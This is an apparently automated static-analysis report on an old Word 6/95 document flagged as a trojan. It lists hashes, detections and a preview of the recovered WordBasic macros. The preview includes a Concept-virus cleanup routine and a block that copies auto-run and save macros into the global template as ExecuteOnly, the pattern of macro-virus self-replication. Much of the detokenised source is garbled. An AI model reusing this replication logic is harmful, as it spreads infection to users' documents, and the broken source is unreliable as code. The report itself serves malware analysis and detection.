Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6a54b8b71e41be1…

MALICIOUS

Office (OLE)

12.0 KB First seen: 2014-02-02
MD5: 7110d27bbc271d07314bfb3ef14bb714 SHA-1: 0fa7e751ef4b6731bfe74c3c3326e2dde387fcec SHA-256: e6a54b8b71e41be17c73be0565322405dffc08244798f5c42392907572954381
102 Risk Score

Heuristics 3

  • ClamAV: Win.Trojan.Muck-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Muck-6
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 5919 bytes
SHA-256: 23b2113ae001487b67f1117b4b2515aa112d12d7076e75ab73d4c50833e3a719
Preview script
First 1,000 lines of the extracted script
, = =        
    8300     29551 25964
        29793     29551     24933     REM macros from any documents that y       29551 =   @cmd6120    
            24930 ,      
,  
        @cmd2065
*           @cmd5720
21349      
    29793 21349          
        357 =
MAIN
@cmd0143 = "IMI" ,
@cmd8044 1
@cmd0241
, -
IsThereAnIni$ = @cmd810d "Word6" , "StartupScreen" , "InfoMap.ini"
IsThereAnIni$ = @cmd810e "Word6" , "StartupScreen" , "On" , "InfoMap.ini"
Win$ = @cmd810c 21
Win$ = "Windows" Platform$ = "Windows"   Platform$ = "Macintosh"
TitleBox$ = "Version 1.2 for " = Platform$
Copyright$ =   ,     @cmd202c ,     26740 ,       8300 @cmd7468  
,        
@cmd0129 590 , 269 , Titlebox$
@cmd8125 13 , 6 , 567 , 211 , "LOGO" , 1 ,
@cmd80c9 19 , 251 , 550 , 13 , Copyright$ ,
@cmd80c7 416 , 218 , 88 , 21
@cmd80d8 25 , 224 , 236 , 16 , "Disable this startup screen." ,
dlg @cmd0129
dlg
StartupScreen$ = @cmd810d "Word6" , "StartupScreen" , "InfoMap.ini"
StartupScreen$ = "On" x = dlg
Checked = dlg
Checked = 1 @cmd810e "Word6" , "StartupScreen" , "Off" , "InfoMap.ini"
REM  ******************************************************************
REM  Macro   : AutoExit
REM  Created : August 11, 1995
REM  Copyright (c) 1995 Microsoft Corp.
REM  Description : detects and removes Concept Virus from document
REM  being closed
REM  *****************************************************************
quiet , notopened , notsaved , notconverted , cleaned , Mac , quote$ , logfile$ , Found$ , sMe$ , stAutoOpen$ , stFileSaveAs$ , NormalDot$ , stBuiltIn$
Localize
REM **** Insert string translation here ****'
warn$ = "Your Normal (Global) template contained the Concept Virus. ScanProt has cleaned your Normal (Global) template. Saving it now will permanently remove the Concept Virus. Save now ?"
msgTitle$ = "Concept Virus detected!"
stAutoOpen$ = "AutoOpen"
stFileSaveAs$ = "FileSaveAs"
NormalDot$ = "Normal.dot"
stBuiltIn$ = "Built In"
REM **** End String Translation ****'
MAIN
, - * EndFunc
Localize
REM  initialize constants
quiet = 0
notopened = 0
notsaved = 0
notconverted = 0
cleaned = 0
REM  What platform are we on, Mac or Win?
@cmd800f @cmd80b5 1 , "Macintosh" 0
Mac = 1
quote$ =
@cmd800f @cmd80b5 1 , "Windows 3." 0
REM  16-bit Windows
Mac = 0
quote$ =
Mac = 0
quote$ = @cmd8005 34
REM **********************************************************************'
REM *	INSERT YOUR CODE HERE								    *'
REM **********************************************************************'
FixIt 0
FixIt 3
REM found all three concept virus macros, so display msg
@cmd802b warn$ , msgTitle$ , 52 = 1 @cmd80a3 1
REM we probably saw a ghost PayLoad, so just save changes
@cmd80a3 1
=
REM **********************************************************************'
REM *	INSERT YOUR CODE HERE								    *'
REM **********************************************************************' =
Err = 0
FixIt
, - * EndFunc
Foo = 0
Foo = Foo = CleanIt "AAAZFS"
Foo = Foo = CleanIt "AAAZAO"
Foo = Foo = CleanIt "PayLoad"
Foo 0
REM  remove possibly correct macros only if definitely evil ones
REM  detected (above)
REM  Since FileSaveAs is localized in many languages we check 		' for the localized name and for FileSaveAs
Foo = Foo = CleanIt stFileSaveAs$
Foo = Foo = CleanIt "FileSaveAs"
Foo Foo = Foo = CleanIt stAutoOpen$
FixIt = Foo =
Err = 0
CleanIt BadMacro$
, - * EndFunc
NormalDot$ = @cmd80ea @cmd80eb NormalDot$
@cmd80b5 2
"1.0" , "1.1" , "1.1a" , "2.0" , "2.0a" , "2.0b" , "2.0c" , "6.0" , "6.0a" , "6.0c"
@cmd8009 @cmd8045 "Microsoft Word" , "User-Dot-Path" , 1 = "\"
sMe$ = @cmd80af @cmd8045 "Microsoft Word" , "User-Dot-Path" = NormalDot$
sMe$ = @cmd80af @cmd8045 "Microsoft Word" , "User-Dot-Path" = "\" = NormalDot$
"7.0" , "7.0a" , "7.0b" , "7.0c"
REM 7.0x is included only as a precaution for the future just in case there ever is such a version.
TD$ = @cmd810d "HKEY_CURRENT_USER\Software\Microsoft\Microsoft Office\95\FileNew\LocalTemplates" , ,
@cmd8009 TD$ , 1 = "\"
sMe$ = TD$ = NormalDot$
sMe$ = TD$ = "\" = NormalDot$
TD$ = sMe$ = NormalDot$
CleanIt = 0
@cmd818e BadMacro$ @cmd818e BadMacro$ stBuiltIn$
mfn$ = @cmd818e BadMacro$
mfn$ = "Global" mfn$ = sMe$
@cmd00de , = mfn$ , = BadMacro$ , = 3
CleanIt = 1
=
Err = 0
MAIN
, -
@cmd80c2 @cmd8025 = ":AutoOpen" , "Global:AutoOpen" , ExecuteOnly
@cmd80c2 @cmd8025 = ":AutoClose" , "Global:AutoClose" , ExecuteOnly
@cmd80c2 @cmd8025 = ":AutoNew" , "Global:AutoNew" , ExecuteOnly
@cmd80c2 @cmd8025 = ":AutoExit" , "Global:AutoExit" , ExecuteOnly
@cmd80c2 @cmd8025 = ":FileSave" , "Global:FileSave" , ExecuteOnly
@cmd80c2 @cmd8025 = ":FileSaveAs" , "Global:FileSaveAs" , ExecuteOnly
@cmd80c2 "Global:AutoOpen" , @cmd8025 = ":AutoOpen" , ExecuteOnly
@cmd80c2 "Global:AutoClose" , @cmd8025 = ":AutoClose" , ExecuteOnly
@cmd80c2 "Global:AutoNew" , @cmd8025 = ":AutoNew" , ExecuteOnly
@cmd80c2 "Global:AutoExit" , @cmd8025 = ":AutoExit" , ExecuteOnly
@cmd80c2 "Global:FileSave" , @cmd8025 = ":FileSave" , ExecuteOnly
@cmd80c2 "Global:FileSaveAs" , @cmd8025 = ":FileSaveAs" , ExecuteOnly
@cmd80a3 1
MAIN
, -
@cmd0053
@cmd0054 = 1
@cmd80c2 "Global:AutoOpen" , @cmd8025 = ":AutoOpen" , ExecuteOnly
@cmd80c2 "Global:AutoClose" , @cmd8025 = ":AutoClose" , ExecuteOnly
@cmd80c2 "Global:AutoNew" , @cmd8025 = ":AutoNew" , ExecuteOnly
@cmd80c2 "Global:AutoExit" , @cmd8025 = ":AutoExit" , ExecuteOnly
@cmd80c2 "Global:FileSave" , @cmd8025 = ":FileSave" , ExecuteOnly
@cmd80c2 "Global:FileSaveAs" , @cmd8025 = ":FileSaveAs" , ExecuteOnly
MAIN
MAIN
, -
@cmd80c2 "Global:AutoOpen" , @cmd8025 = ":AutoOpen" , ExecuteOnly
@cmd80c2 "Global:AutoClose" , @cmd8025 = ":AutoClose" , ExecuteOnly
@cmd80c2 "Global:AutoNew" , @cmd8025 = ":AutoNew" , ExecuteOnly
@cmd80c2 "Global:AutoExit" , @cmd8025 = ":AutoExit" , ExecuteOnly
@cmd80c2 "Global:FileSave" , @cmd8025 = ":FileSave" , ExecuteOnly
@cmd80c2 "Global:FileSaveAs" , @cmd8025 = ":FileSaveAs" , ExecuteOnly
dlg @cmd0054
dlg
dlg
@cmd0054 dlg
@cmd0054 = 1